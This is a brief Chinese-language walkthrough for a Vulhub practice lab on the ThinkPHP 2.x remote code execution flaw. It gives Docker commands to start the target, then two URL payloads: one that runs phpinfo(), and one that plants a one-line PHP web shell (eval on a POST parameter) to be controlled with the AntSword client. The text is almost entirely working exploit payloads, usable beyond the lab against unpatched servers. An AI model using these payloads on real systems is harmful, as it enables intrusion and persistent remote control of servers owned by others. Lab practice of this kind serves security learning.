1.执行以下命令启动靶场环境并在浏览器访问 cd /vulhub/thinkphp/2-rce #进入漏洞环境所在目录 docker-compose up -d #启动靶场 docker ps #查看容器信息 2.访问网页 3.构造payload 192.168.157.142:8080?s=/Index/index/L/${@phpinfo()} 4、写入一句话木马,使用蚁剑连接 192.168.157.142:8080/?s=/Index/index/name/${@print(eval($_POST[cmd]))}
